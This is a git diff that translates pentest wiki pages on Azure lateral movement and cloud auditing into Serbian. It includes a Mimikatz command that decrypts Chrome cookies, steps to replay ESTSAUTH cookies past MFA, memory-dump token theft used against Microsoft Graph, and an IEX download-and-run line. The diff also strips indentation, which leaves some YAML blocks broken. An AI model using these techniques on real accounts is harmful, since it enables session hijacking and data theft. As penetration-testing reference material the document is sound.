+Sertifikati će trajati isto kao i PRT. Da biste koristili sertifikat, možete koristiti python alat [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) koji će **autentifikovati** na udaljenoj mašini, pokrenuti **PSEXEC** i **otvoriti CMD** na žrtvinoj mašini. Ovo će nam omogućiti da ponovo koristimo Mimikatz da bismo dobili PRT drugog korisnika.
 ```bash
 Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
 ```
-
 ## References
 
-- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
+- Za više detalja o tome kako Pass the Certificate funkcioniše, pogledajte originalni post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
index f6695c40a..8c41c5d4c 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
@@ -2,40 +2,34 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Why Cookies?
+## Zašto kolačići?
 
-Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
+Browser **kolačići** su odličan mehanizam za **obići autentifikaciju i MFA**. Pošto je korisnik već autentifikovan u aplikaciji, sesijski **kolačić** se može koristiti za **pristup podacima** kao taj korisnik, bez potrebe za ponovnom autentifikacijom.
 
-You can see where are **browser cookies located** in:
+Možete videti gde se **browser kolačići nalaze** u:
 
 {{#ref}}
 https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
 {{#endref}}
 
-## Attack
+## Napad
 
-The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
+Izazovan deo je to što su ti **kolačići enkriptovani** za **korisnika** putem Microsoft Data Protection API (**DPAPI**). Ovo je enkriptovano koristeći kriptografske [ključeve vezane za korisnika](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) kojem kolačići pripadaju. Možete pronaći više informacija o ovome u:
 
 {{#ref}}
 https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
 {{#endref}}
 
-With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command:
-
+Sa Mimikatz u ruci, mogu **izvući korisničke kolačiće** čak iako su enkriptovani ovom komandom:
 ```bash
 mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
 ```
+Za Azure, brinemo se o autentifikacionim kolačićima uključujući **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, i **`ESTSAUTHLIGHT`**. Oni su tu jer je korisnik nedavno bio aktivan na Azure-u.
 
-For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
-
-Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
+Jednostavno idite na login.microsoftonline.com i dodajte kolačić **`ESTSAUTHPERSISTENT`** (generisan opcijom “Stay Signed In”) ili **`ESTSAUTH`**. I bićete autentifikovani.
 
 ## References
 
 - [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
index 28bc5b415..697829684 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -2,10 +2,6 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+**Proveri:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
index a79c7a659..3b57497f0 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -2,10 +2,6 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
+**Proverite post na** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) iako se drugi post koji objašnjava isto može naći na [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
index 1ba819b3a..785e9847b 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
@@ -2,16 +2,15 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## **Basic Information**
+## **Osnovne informacije**
 
-As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
+Kao što je objašnjeno u [**ovom videu**](https://www.youtube.com/watch?v=OHKZkXC4Duw), neki Microsoft softveri sinhronizovani sa cloud-om (Excel, Teams...) mogu **čuvati pristupne tokene u čistom tekstu u memoriji**. Tako da samo **dumpovanje** **memorije** procesa i **grepovanje za JWT tokene** može vam omogućiti pristup raznim resursima žrtve u cloud-u, zaobilazeći MFA.
 
-Steps:
-
-1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
-2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
-3. Find the tokens that interest you the most and run tools over them:
+Koraci:
 
+1. Dumpujte excel procese sinhronizovane sa EntraID korisnikom pomoću vašeg omiljenog alata.
+2. Pokrenite: `string excel.dmp | grep 'eyJ0'` i pronađite nekoliko tokena u izlazu
+3. Pronađite tokene koji vas najviše zanimaju i pokrenite alate nad njima:
 ```bash
 # Check the identity of the token
 curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq
@@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sit
 ┌──(magichk㉿black-pearl)-[~]
 └─$ curl -o  -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>'
 ```
-
-**Note that these kind of access tokens can be also found inside other processes.**
+**Napomena da se ovi tipovi pristupnih tokena mogu naći i unutar drugih procesa.**
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
index 39ee71d6c..7ef1cc2b7 100644
--- a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
@@ -2,10 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
+Da biste započeli testove, trebali biste imati pristup sa korisnikom koji ima **Reader permissions over the subscription** i **Global Reader role in AzureAD**. Ako čak ni u tom slučaju **niste u mogućnosti da pristupite sadržaju Storage accounts**, možete to popraviti sa **role Storage Account Contributor**.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md
index 0be67db54..5c9930e7b 100644
--- a/src/pentesting-cloud/pentesting-cloud-methodology.md
+++ b/src/pentesting-cloud/pentesting-cloud-methodology.md
@@ -6,43 +6,42 @@
 
 ## Basic Methodology
 
-Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment:
+Svaka cloud platforma ima svoje specifičnosti, ali generalno postoji nekoliko **zajedničkih stvari koje pentester treba da proveri** prilikom testiranja cloud okruženja:
 
-- **Benchmark checks**
-  - This will help you **understand the size** of the environment and **services used**
-  - It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools**
-- **Services Enumeration**
-  - You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test.
-  - This will allow you to know **what is exactly being used** in the cloud env
-  - This will help a lot in the next steps
-- **Check exposed assets**
-  - This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed.
-    - Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets)
-  - Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?)
-- **Check permissions**
-  - Here you should **find out all the permissions of each role/user** inside the cloud and how are they used
-    - Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already
-    - If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100)
-  - It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**.
-    - Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported.
-- **Check Integrations**
-  - It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env.
-    - For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\
-      For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data).
-    - For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\
-      For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud.
+- **Provere standarda**
+- Ovo će vam pomoći da **razumete veličinu** okruženja i **usluge koje se koriste**
+- Takođe će vam omogućiti da pronađete neke **brze greške u konfiguraciji** jer većinu ovih testova možete izvršiti pomoću **automatskih alata**
+- **Enumeracija usluga**
+- Verovatno nećete pronaći mnogo više grešaka u konfiguraciji ovde ako ste pravilno izvršili provere standarda, ali mogli biste pronaći neke koje nisu bile tražene u testu standarda.
+- Ovo će vam omogućiti da znate **šta se tačno koristi** u cloud okruženju
+- Ovo će mnogo pomoći u sledećim koracima
+- **Proverite izložene resurse**
+- Ovo se može uraditi tokom prethodne sekcije, potrebno je da **otkrijete sve što je potencijalno izloženo** internetu i kako se može pristupiti.
+- Ovde mislim na **ručno izloženu infrastrukturu** kao što su instance sa web stranicama ili drugi portovi koji su izloženi, kao i na druge **cloud upravljane usluge koje se mogu konfigurisati** da budu izložene (kao što su DB-ovi ili bucket-i)
+- Zatim treba da proverite **da li taj resurs može biti izložen ili ne** (povjerljive informacije? ranjivosti? greške u konfiguraciji izložene usluge?)
+- **Proverite dozvole**
+- Ovde treba da **otkrijete sve dozvole svake uloge/korisnika** unutar clouda i kako se koriste
+- Previše **visoko privilegovanih** (kontrolišu sve) naloga? Generisani ključevi koji se ne koriste?... Većina ovih provera bi već trebala biti izvršena u testovima standarda
+- Ako klijent koristi OpenID ili SAML ili neku drugu **federaciju**, možda ćete morati da ih pitate za dodatne **informacije** o tome **kako se dodeljuju svake uloge** (nije isto da je admin uloga dodeljena 1 korisniku ili 100)
+- **Nije dovoljno pronaći** koji korisnici imaju **admin** dozvole "\*:\*". Postoji mnogo **drugih dozvola** koje, u zavisnosti od korišćenih usluga, mogu biti veoma **osetljive**.
+- Štaviše, postoje **potencijalni putevi za eskalaciju privilegija** koji se mogu iskoristiti zloupotrebom dozvola. Sve ove stvari treba uzeti u obzir i **prijaviti što više puteva za eskalaciju privilegija**.
+- **Proverite integracije**
+- Veoma je verovatno da se **integracije sa drugim cloud-ovima ili SaaS** koriste unutar cloud okruženja.
+- Za **integracije clouda koji audirate** sa drugim platformama, trebate obavestiti **ko ima pristup (zloupotrebu) toj integraciji** i trebate pitati **kako je osetljiva** akcija koja se izvršava.\
+Na primer, ko može da piše u AWS bucket gde GCP dobija podatke (pitajte koliko je osetljiva akcija u GCP-u koja se bavi tim podacima).
+- Za **integracije unutar clouda koji audirate** sa eksternih platformi, trebate pitati **ko ima eksterni pristup (zloupotrebu) toj integraciji** i proveriti kako se ti podaci koriste.\
+Na primer, ako usluga koristi Docker sliku hostovanu u GCR, trebate pitati ko ima pristup da to izmeni i koje osetljive informacije i pristup će ta slika dobiti kada se izvrši unutar AWS clouda.
 
 ## Multi-Cloud tools
 
-There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
+Postoji nekoliko alata koji se mogu koristiti za testiranje različitih cloud okruženja. Koraci instalacije i linkovi biće navedeni u ovoj sekciji.
 
 ### [PurplePanda](https://github.com/carlospolop/purplepanda)
 
-A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.**
+Alat za **identifikaciju loših konfiguracija i puteva za eskalaciju privilegija u cloud-ovima i između cloud/SaaS.**
 
 {{#tabs }}
 {{#tab name="Install" }}
-
 ```bash
 # You need to install and run neo4j also
 git clone https://github.com/carlospolop/PurplePanda
@@ -54,29 +53,25 @@ export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687"
 export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda"
 python3 main.py -h # Get help
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 export GOOGLE_DISCOVERY=$(echo 'google:
 - file_path: ""
 
 - file_path: ""
-  service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64)
+service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64)
 
 python3 main.py -a -p google #Get basic info of the account to check it's correctly configured
 python3 main.py -e -p google #Enumerate the env
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [Prowler](https://github.com/prowler-cloud/prowler)
 
-It supports **AWS, GCP & Azure**. Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws)
-
+Podržava **AWS, GCP i Azure**. Proverite kako da konfigurišete svakog provajdera na [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws)
 ```bash
 # Install
 pip install prowler
@@ -91,14 +86,12 @@ prowler aws --profile custom-profile [-M csv json json-asff html]
 prowler  --list-checks
 prowler  --list-services
 ```
-
 ### [CloudSploit](https://github.com/aquasecurity/cloudsploit)
 
 AWS, Azure, Github, Google, Oracle, Alibaba
 
 {{#tabs }}
-{{#tab name="Install" }}
-
+{{#tab name="Instalacija" }}
 ```bash
 # Install
 git clone https://github.com/aquasecurity/cloudsploit.git
@@ -107,16 +100,13 @@ npm install
 ./index.js -h
 ## Docker instructions in github
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 ## You need to have creds for a service account and set them in config.js file
 ./index.js --cloud google --config 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
@@ -125,8 +115,7 @@ npm install
 AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
 
 {{#tabs }}
-{{#tab name="Install" }}
-
+{{#tab name="Instalacija" }}
 ```bash
 mkdir scout; cd scout
 virtualenv -p python3 venv
@@ -135,24 +124,21 @@ pip install scoutsuite
 scout --help
 ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 scout gcp --report-dir /tmp/gcp --user-account --all-projects
 ## use "--service-account KEY_FILE" instead of "--user-account" to use a service account
 
 SCOUT_FOLDER_REPORT="/tmp"
 for pid in $(gcloud projects list --format="value(projectId)"); do
-    echo "================================================"
-    echo "Checking $pid"
-    mkdir "$SCOUT_FOLDER_REPORT/$pid"
-    scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid"
+echo "================================================"
+echo "Checking $pid"
+mkdir "$SCOUT_FOLDER_REPORT/$pid"
+scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid"
 done
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
@@ -160,17 +146,14 @@ done
 
 {{#tabs }}
 {{#tab name="Install" }}
-Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew:
-
+Preuzmite i instalirajte Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Ili koristite Brew:
 ```
 brew tap turbot/tap
 brew install steampipe
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 # Install gcp plugin
 steampipe plugin install gcp
@@ -183,13 +166,11 @@ steampipe dashboard
 # To run all the checks from rhe cli
 steampipe check all
 ```
-
 

 
-Check all Projects
-
-In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script
+Proveri sve projekte
 
+Da biste proverili sve projekte, potrebno je da generišete `gcp.spc` datoteku koja označava sve projekte koje treba testirati. Možete jednostavno pratiti uputstva iz sledećeg skripta.
 ```bash
 FILEPATH="/tmp/gcp.spc"
 rm -rf "$FILEPATH" 2>/dev/null
@@ -197,32 +178,30 @@ rm -rf "$FILEPATH" 2>/dev/null
 # Generate a json like object for each project
 for pid in $(gcloud projects list --format="value(projectId)"); do
 echo "connection \"gcp_$(echo -n $pid | tr "-" "_" )\" {
-    plugin  = \"gcp\"
-    project = \"$pid\"
+plugin  = \"gcp\"
+project = \"$pid\"
 }" >> "$FILEPATH"
 done
 
 # Generate the aggragator to call
 echo 'connection "gcp_all" {
-  plugin      = "gcp"
-  type        = "aggregator"
-  connections = ["gcp_*"]
+plugin      = "gcp"
+type        = "aggregator"
+connections = ["gcp_*"]
 }' >> "$FILEPATH"
 
 echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generated"
 ```
-
 

 
-To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights)
+Da biste proverili **druge GCP uvide** (korisno za enumeraciju usluga) koristite: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights)
 
-To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
+Da biste proverili Terraform GCP kod: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
 
-More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)
+Više GCP dodataka za Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)
 {{#endtab }}
 
 {{#tab name="AWS" }}
-
 ```bash
 # Install aws plugin
 steampipe plugin install aws
@@ -246,29 +225,27 @@ cd steampipe-mod-aws-compliance
 steampipe dashboard # To see results in browser
 steampipe check all --export=/tmp/output4.json
 ```
+Da biste proverili Terraform AWS kod: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
 
-To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
-
-More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)
+Više AWS dodataka za Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)
 {{#endtab }}
 {{#endtabs }}
 
 ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite)
 
 AWS, GCP, Azure, DigitalOcean.\
-It requires python2.7 and looks unmaintained.
+Zahteva python2.7 i izgleda da nije održavan.
 
 ### Nessus
 
-Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
+Nessus ima _**Audit Cloud Infrastructure**_ skeniranje koje podržava: AWS, Azure, Office 365, Rackspace, Salesforce. Neka dodatna podešavanja u **Azure** su potrebna da bi se dobio **Client Id**.
 
 ### [**cloudlist**](https://github.com/projectdiscovery/cloudlist)
 
-Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
+Cloudlist je **multi-cloud alat za dobijanje resursa** (Hostname, IP adrese) od Cloud provajdera.
 
 {{#tabs }}
 {{#tab name="Cloudlist" }}
-
 ```bash
 cd /tmp
 wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip
@@ -276,46 +253,40 @@ unzip cloudlist_1.0.1_macOS_arm64.zip
 chmod +x cloudlist
 sudo mv cloudlist /usr/local/bin
 ```
-
 {{#endtab }}
 
-{{#tab name="Second Tab" }}
-
+{{#tab name="Drugi Tab" }}
 ```bash
 ## For GCP it requires service account JSON credentials
 cloudlist -config 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [**cartography**](https://github.com/lyft/cartography)
 
-Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
+Cartography je Python alat koji konsoliduje infrastrukturne resurse i odnose između njih u intuitivnom grafičkom prikazu koji pokreće Neo4j baza podataka.
 
 {{#tabs }}
 {{#tab name="Install" }}
-
 ```bash
 # Installation
 docker image pull ghcr.io/lyft/cartography
 docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help
 ## Install a Neo4j DB version 3.5.*
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 docker run --platform linux/amd64 \
-     --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \
-     -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \
-     -e NEO4j_PASSWORD="s3cr3t" \
-     ghcr.io/lyft/cartography  \
-     --neo4j-uri bolt://host.docker.internal:7687 \
-     --neo4j-password-env-var NEO4j_PASSWORD \
-     --neo4j-user neo4j
+--volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \
+-e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \
+-e NEO4j_PASSWORD="s3cr3t" \
+ghcr.io/lyft/cartography  \
+--neo4j-uri bolt://host.docker.internal:7687 \
+--neo4j-password-env-var NEO4j_PASSWORD \
+--neo4j-user neo4j
 
 
 # It only checks for a few services inside GCP (https://lyft.github.io/cartography/modules/gcp/index.html)
@@ -326,17 +297,15 @@ docker run --platform linux/amd64 \
 ## Google Kubernetes Engine
 ### If you can run starbase or purplepanda you will get more info
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [**starbase**](https://github.com/JupiterOne/starbase)
 
-Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
+Starbase prikuplja resurse i odnose iz usluga i sistema uključujući cloud infrastrukturu, SaaS aplikacije, bezbednosne kontrole i još mnogo toga u intuitivnom grafičkom prikazu podržanom Neo4j bazom podataka.
 
 {{#tabs }}
 {{#tab name="Install" }}
-
 ```bash
 # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/
 npm install --global yarn
@@ -359,44 +328,40 @@ docker build --no-cache -t starbase:latest .
 docker-compose run starbase setup
 docker-compose run starbase run
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```yaml
 ## Config for GCP
 ### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
 ### It requires service account credentials
 
 integrations:
-  - name: graph-google-cloud
-    instanceId: testInstanceId
-    directory: ./.integrations/graph-google-cloud
-    gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
-    config:
-      SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}"
-      PROJECT_ID: ""
-      FOLDER_ID: ""
-      ORGANIZATION_ID: ""
-      CONFIGURE_ORGANIZATION_PROJECTS: false
+- name: graph-google-cloud
+instanceId: testInstanceId
+directory: ./.integrations/graph-google-cloud
+gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
+config:
+SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}"
+PROJECT_ID: ""
+FOLDER_ID: ""
+ORGANIZATION_ID: ""
+CONFIGURE_ORGANIZATION_PROJECTS: false
 
 storage:
-  engine: neo4j
-  config:
-    username: neo4j
-    password: s3cr3t
-    uri: bolt://localhost:7687
-    #Consider using host.docker.internal if from docker
+engine: neo4j
+config:
+username: neo4j
+password: s3cr3t
+uri: bolt://localhost:7687
+#Consider using host.docker.internal if from docker
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [**SkyArk**](https://github.com/cyberark/SkyArk)
 
-Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell.
-
+Otkrivanje najprivilegovanijih korisnika u skeniranoj AWS ili Azure sredini, uključujući AWS Shadow Admins. Koristi powershell.
 ```powershell
 Import-Module .\SkyArk.ps1 -force
 Start-AzureStealth
@@ -405,18 +370,17 @@ Start-AzureStealth
 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
 Scan-AzureAdmins
 ```
-
 ### [Cloud Brute](https://github.com/0xsha/CloudBrute)
 
-A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
+Alat za pronalaženje infrastrukture, fajlova i aplikacija kompanije (meta) na vodećim cloud provajderima (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
 
 ### [CloudFox](https://github.com/BishopFox/cloudfox)
 
-- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
-- It is an enumeration tool which is intended to compliment manual pentesting.
-- It doesn't create or modify any data within the cloud environment.
+- CloudFox je alat za pronalaženje iskoristivih puteva napada u cloud infrastrukturi (trenutno podržani samo AWS i Azure, GCP dolazi uskoro).
+- To je alat za enumeraciju koji je namenjen da dopuni manuelni pentesting.
+- Ne kreira niti menja bilo kakve podatke unutar cloud okruženja.
 
-### More lists of cloud security tools
+### Više lista alata za cloud bezbednost
 
 - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
 
@@ -448,14 +412,10 @@ azure-security/
 
 ### Attack Graph
 
-[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
+[**Stormspotter** ](https://github.com/Azure/Stormspotter) kreira “graf napada” resursa u Azure pretplati. Omogućava red timovima i pentesterima da vizualizuju površinu napada i mogućnosti prebacivanja unutar zakupca, i pojačava vaše branioca da brzo orijentišu i prioritizuju rad na odgovoru na incidente.
 
 ### Office365
 
